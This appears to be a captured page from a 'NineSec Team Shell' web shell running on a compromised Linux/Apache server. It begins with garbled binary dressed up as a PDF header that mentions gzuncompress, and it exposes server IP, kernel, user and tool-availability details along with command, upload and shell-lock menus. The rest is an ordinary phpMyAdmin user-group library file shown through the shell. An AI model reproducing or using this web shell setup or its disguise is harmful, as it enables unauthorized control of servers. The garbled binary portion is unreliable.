%PDF-1.3 %âãÏÓ 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream xœ¥\mo7þ ÿa?îâñH£ÑÌàŠyi{¹$EÚ(i?¬cÇÞÄkûürAþý‰½Žv·EÛízF¢HI|H‘Ô?¿{Ø|Z|X|÷Ýñó‡‡õÇËó³Å‡ã77Û?O¾Ýž¿__l®×››ëãßOàя77çwß¿xñêåâÅÉÓ'Ç?ªÅ°8ùôôI] µûgQ»ÔB©¦2zaà³]œlÝûÅ|üôôɇåÛ՟‹“?}òƒ£ " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 192.168.60.199  /  Your IP : 192.168.60.1
Web Server : Apache
System : Linux PROD-conference 6.8.12-17-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-17 (2025-11-21T11:16Z) x86_64
User : www-data ( 33)
PHP Version : 5.6.40-0+deb8u12
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /lib/../usr/../usr/share/phpmyadmin/libraries/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //lib/../usr/../usr/share/phpmyadmin/libraries/server_user_groups.lib.php
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * set of functions for user group handling
 *
 * @package PhpMyAdmin
 */

if (! defined('PHPMYADMIN')) {
    exit;
}

/**
 * Return HTML to list the users belonging to a given user group
 *
 * @param string $userGroup user group name
 *
 * @return string HTML to list the users belonging to a given user group
 */
function PMA_getHtmlForListingUsersofAGroup($userGroup)
{
    $html_output  = '<h2>'
        . sprintf(__('Users of \'%s\' user group'), htmlspecialchars($userGroup))
        . '</h2>';

    $usersTable = PMA_Util::backquote($GLOBALS['cfg']['Server']['pmadb'])
        . "." . PMA_Util::backquote($GLOBALS['cfg']['Server']['users']);
    $sql_query = "SELECT `username` FROM " . $usersTable
        . " WHERE `usergroup`='" . PMA_Util::sqlAddSlashes($userGroup) . "'";
    $result = PMA_queryAsControlUser($sql_query, false);
    if ($result) {
        if ($GLOBALS['dbi']->numRows($result) == 0) {
            $html_output .= '<p>'
                . __('No users were found belonging to this user group.')
                . '</p>';
        } else {
            $html_output .= '<table>'
                . '<thead><tr><th>#</th><th>' . __('User') . '</th></tr></thead>'
                . '<tbody>';
            $i = 0;
            while ($row = $GLOBALS['dbi']->fetchRow($result)) {
                $i++;
                $html_output .= '<tr>'
                    . '<td>' . $i . ' </td>'
                    . '<td>' . htmlspecialchars($row[0]) . '</td>'
                    . '</tr>';
            }
            $html_output .= '</tbody>'
                . '</table>';
        }
    }
    $GLOBALS['dbi']->freeResult($result);
    return $html_output;
}

/**
 * Returns HTML for the 'user groups' table
 *
 * @return string HTML for the 'user groups' table
 */
function PMA_getHtmlForUserGroupsTable()
{
    $tabs = PMA_Util::getMenuTabList();

    $html_output  = '<h2>' . __('User groups') . '</h2>';
    $groupTable = PMA_Util::backquote($GLOBALS['cfg']['Server']['pmadb'])
        . "." . PMA_Util::backquote($GLOBALS['cfg']['Server']['usergroups']);
    $sql_query = "SELECT * FROM " . $groupTable . " ORDER BY `usergroup` ASC";
    $result = PMA_queryAsControlUser($sql_query, false);

    if ($result && $GLOBALS['dbi']->numRows($result)) {
        $html_output .= '<form name="userGroupsForm" id="userGroupsForm"'
            . ' action="server_privileges.php" method="post">';
        $html_output .= PMA_URL_getHiddenInputs();
        $html_output .= '<table id="userGroupsTable">';
        $html_output .= '<thead><tr>';
        $html_output .= '<th style="white-space: nowrap">'
            . __('User group') . '</th>';
        $html_output .= '<th>' . __('Server level tabs') . '</th>';
        $html_output .= '<th>' . __('Database level tabs') . '</th>';
        $html_output .= '<th>' . __('Table level tabs') . '</th>';
        $html_output .= '<th>' . __('Action') . '</th>';
        $html_output .= '</tr></thead>';
        $html_output .= '<tbody>';

        $odd = true;
        $userGroups = array();
        while ($row = $GLOBALS['dbi']->fetchAssoc($result)) {
            $groupName = $row['usergroup'];
            if (! isset($userGroups[$groupName])) {
                $userGroups[$groupName] = array();
            }
            $userGroups[$groupName][$row['tab']] = $row['allowed'];
        }
        foreach ($userGroups as $groupName => $tabs) {
            $html_output .= '<tr class="' . ($odd ? 'odd' : 'even') . '">';
            $html_output .= '<td>' . htmlspecialchars($groupName) . '</td>';
            $html_output .= '<td>' . _getAllowedTabNames($tabs, 'server') . '</td>';
            $html_output .= '<td>' . _getAllowedTabNames($tabs, 'db') . '</td>';
            $html_output .= '<td>' . _getAllowedTabNames($tabs, 'table') . '</td>';

            $html_output .= '<td>';
            $html_output .= '<a class="" href="server_user_groups.php'
                . PMA_URL_getCommon(
                    array(
                        'viewUsers' => 1, 'userGroup' => $groupName
                    )
                )
                . '">'
                . PMA_Util::getIcon('b_usrlist.png', __('View users')) . '</a>';
            $html_output .= '&nbsp;&nbsp;';
            $html_output .= '<a class="" href="server_user_groups.php'
                . PMA_URL_getCommon(
                    array(
                        'editUserGroup' => 1, 'userGroup' => $groupName
                    )
                )
                . '">'
                . PMA_Util::getIcon('b_edit.png', __('Edit')) . '</a>';
            $html_output .= '&nbsp;&nbsp;';
            $html_output .= '<a class="deleteUserGroup ajax"'
                . ' href="server_user_groups.php'
                . PMA_URL_getCommon(
                    array(
                        'deleteUserGroup' => 1, 'userGroup' => $groupName
                    )
                )
                . '">'
                . PMA_Util::getIcon('b_drop.png', __('Delete')) . '</a>';
            $html_output .= '</td>';

            $html_output .= '</tr>';

            $odd = ! $odd;
        }

        $html_output .= '</tbody>';
        $html_output .= '</table>';
        $html_output .= '</form>';
    }
    $GLOBALS['dbi']->freeResult($result);

    $html_output .= '<fieldset id="fieldset_add_user_group">';
    $html_output .= '<a href="server_user_groups.php'
        . PMA_URL_getCommon(array('addUserGroup' => 1)) . '">'
        . PMA_Util::getIcon('b_usradd.png')
        . __('Add user group') . '</a>';
    $html_output .= '</fieldset>';

    return $html_output;
}

/**
 * Returns the list of allowed menu tab names
 * based on a data row from usergroup table.
 *
 * @param array  $row   row of usergroup table
 * @param string $level 'server', 'db' or 'table'
 *
 * @return string comma seperated list of allowed menu tab names
 */
function _getAllowedTabNames($row, $level)
{
    $tabNames = array();
    $tabs = PMA_Util::getMenuTabList($level);
    foreach ($tabs as $tab => $tabName) {
        if (! isset($row[$level . '_' . $tab])
            || $row[$level . '_' . $tab] == 'Y'
        ) {
            $tabNames[] = $tabName;
        }
    }
    return implode(', ', $tabNames);
}

/**
 * Deletes a user group
 *
 * @param string $userGroup user group name
 *
 * @return void
 */
function PMA_deleteUserGroup($userGroup)
{
    $userTable = PMA_Util::backquote($GLOBALS['cfg']['Server']['pmadb'])
        . "." . PMA_Util::backquote($GLOBALS['cfg']['Server']['users']);
    $groupTable = PMA_Util::backquote($GLOBALS['cfg']['Server']['pmadb'])
        . "." . PMA_Util::backquote($GLOBALS['cfg']['Server']['usergroups']);
    $sql_query = "DELETE FROM " . $userTable
        . " WHERE `usergroup`='" . PMA_Util::sqlAddSlashes($userGroup) . "'";
    PMA_queryAsControlUser($sql_query, true);
    $sql_query = "DELETE FROM " . $groupTable
        . " WHERE `usergroup`='" . PMA_Util::sqlAddSlashes($userGroup) . "'";
    PMA_queryAsControlUser($sql_query, true);
}

/**
 * Returns HTML for add/edit user group dialog
 *
 * @param string $userGroup name of the user group in case of editing
 *
 * @return string HTML for add/edit user group dialog
 */
function PMA_getHtmlToEditUserGroup($userGroup = null)
{
    $html_output = '';
    if ($userGroup == null) {
        $html_output .= '<h2>' . __('Add user group') . '</h2>';
    } else {
        $html_output .= '<h2>'
            . sprintf(__('Edit user group: \'%s\''), htmlspecialchars($userGroup))
            . '</h2>';
    }

    $html_output .= '<form name="userGroupForm" id="userGroupForm"'
        . ' action="server_user_groups.php" method="post">';
    $urlParams = array();
    if ($userGroup != null) {
        $urlParams['userGroup'] = $userGroup;
        $urlParams['editUserGroupSubmit'] = '1';
    } else {
        $urlParams['addUserGroupSubmit'] = '1';
    }
    $html_output .= PMA_URL_getHiddenInputs($urlParams);

    $html_output .= '<fieldset id="fieldset_user_group_rights">';
    $html_output .= '<legend>' . __('User group menu assignments')
        . '&nbsp;&nbsp;&nbsp;'
        . '<input type="checkbox" class="checkall_box" title="Check All">'
        . '<label for="addUsersForm_checkall">' . __('Check All') . '</label>'
        . '</legend>';

    if ($userGroup == null) {
        $html_output .= '<label for="userGroup">' . __('Group name:') . '</label>';
        $html_output .= '<input type="text" name="userGroup" '
            . 'autocomplete="off" required="required" />';
        $html_output .= '<div class="clearfloat"></div>';
    }

    $allowedTabs = array(
        'server' => array(),
        'db'     => array(),
        'table'  => array()
    );
    if ($userGroup != null) {
        $groupTable = PMA_Util::backquote($GLOBALS['cfg']['Server']['pmadb'])
            . "." . PMA_Util::backquote($GLOBALS['cfg']['Server']['usergroups']);
        $sql_query = "SELECT * FROM " . $groupTable
            . " WHERE `usergroup`='" . PMA_Util::sqlAddSlashes($userGroup) . "'";
        $result = PMA_queryAsControlUser($sql_query, false);
        if ($result) {
            while ($row = $GLOBALS['dbi']->fetchAssoc($result)) {
                $key = $row['tab'];
                $value = $row['allowed'];
                if (substr($key, 0, 7) == 'server_' && $value == 'Y') {
                    $allowedTabs['server'][] = substr($key, 7);
                } elseif (substr($key, 0, 3) == 'db_' && $value == 'Y') {
                    $allowedTabs['db'][] = substr($key, 3);
                } elseif (substr($key, 0, 6) == 'table_' && $value == 'Y') {
                    $allowedTabs['table'][] = substr($key, 6);
                }
            }
        }
        $GLOBALS['dbi']->freeResult($result);
    }

    $html_output .= _getTabList(
        __('Server-level tabs'), 'server', $allowedTabs['server']
    );
    $html_output .= _getTabList(
        __('Database-level tabs'), 'db', $allowedTabs['db']
    );
    $html_output .= _getTabList(
        __('Table-level tabs'), 'table', $allowedTabs['table']
    );

    $html_output .= '</fieldset>';

    $html_output .= '<fieldset id="fieldset_user_group_rights_footer"'
        . ' class="tblFooters">';
    $html_output .= '<input type="submit" name="update_privs" value="Go">';
    $html_output .= '</fieldset>';

    return $html_output;
}

/**
 * Returns HTML for checkbox groups to choose
 * tabs of 'server', 'db' or 'table' levels.
 *
 * @param string $title    title of the checkbox group
 * @param string $level    'server', 'db' or 'table'
 * @param array  $selected array of selected allowed tabs
 *
 * @return string HTML for checkbox groups
 */
function _getTabList($title, $level, $selected)
{
    $tabs = PMA_Util::getMenuTabList($level);
    $html_output = '<fieldset>';
    $html_output .= '<legend>' . $title . '</legend>';
    foreach ($tabs as $tab => $tabName) {
        $html_output .= '<div class="item">';
        $html_output .= '<input type="checkbox" class="checkall"'
            . (in_array($tab, $selected) ? ' checked="checked"' : '')
            . ' name="' . $level . '_' . $tab .  '" value="Y" />';
        $html_output .= '<label for="' . $level . '_' . $tab .  '">'
            . '<code>' . $tabName . '</code>'
            . '</label>';
        $html_output .= '</div>';
    }
    $html_output .= '</fieldset>';
    return $html_output;
}

/**
 * Add/update a user group with allowed menu tabs.
 *
 * @param string  $userGroup user group name
 * @param boolean $new       whether this is a new user group
 *
 * @return void
 */
function PMA_editUserGroup($userGroup, $new = false)
{
    $tabs = PMA_Util::getMenuTabList();
    $groupTable = PMA_Util::backquote($GLOBALS['cfg']['Server']['pmadb'])
        . "." . PMA_Util::backquote($GLOBALS['cfg']['Server']['usergroups']);

    if (! $new) {
        $sql_query = "DELETE FROM " . $groupTable
            . " WHERE `usergroup`='" . PMA_Util::sqlAddSlashes($userGroup) . "';";
        PMA_queryAsControlUser($sql_query, true);
    }

    $sql_query = "INSERT INTO " . $groupTable
        . "(`usergroup`, `tab`, `allowed`)"
        . " VALUES ";
    $first = true;
    foreach ($tabs as $tabGroupName => $tabGroup) {
        foreach ($tabs[$tabGroupName] as $tab => $tabName) {
            if (! $first) {
                $sql_query .= ", ";
            }
            $tabName = $tabGroupName . '_' . $tab;
            $allowed = isset($_REQUEST[$tabName]) && $_REQUEST[$tabName] == 'Y';
            $sql_query .= "('" . PMA_Util::sqlAddSlashes($userGroup) . "', '" . $tabName . "', '"
                . ($allowed ? "Y" : "N") . "')";
            $first = false;
        }
    }
    $sql_query .= ";";
    PMA_queryAsControlUser($sql_query, true);
}
?>

NineSec Team - 2022